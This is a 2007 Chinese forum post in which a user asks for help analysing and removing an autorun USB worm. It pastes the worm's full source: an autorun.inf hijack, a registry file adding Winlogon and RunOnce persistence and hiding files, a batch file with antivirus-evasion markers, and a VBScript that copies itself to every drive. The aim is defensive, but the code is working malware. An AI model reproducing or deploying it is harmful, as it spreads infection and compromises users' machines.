发表于: 2007-04-27 09:27 | 显示全部 短消息 资料
字号: 1楼

请高手帮忙分析下源代码,如何查杀这个可恶病毒!

前不久我朋友电脑中了Auto病毒,所有盘双击打不开,一查看,有四个文件,分别是
autorun.inf,autorun.bat,autorun.reg,autorun.vbs.每个盘同时删掉后开机依旧有,先把其源代码公示下,请高手帮忙分析下啊!
autorun.inf的源代码
[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs

open=RavMon.exe
shellEXEcute=RavMon.exe
shell\Auto\command=RavMon.exe
autorun.bat的源代码
@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit

';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end
autorun.reg的源代码
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
autorun.vbs的源代码
on error resume next
Set WshShell =CreateObject("WScript.Shell")

if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
最后编辑2007-04-27 09:24:03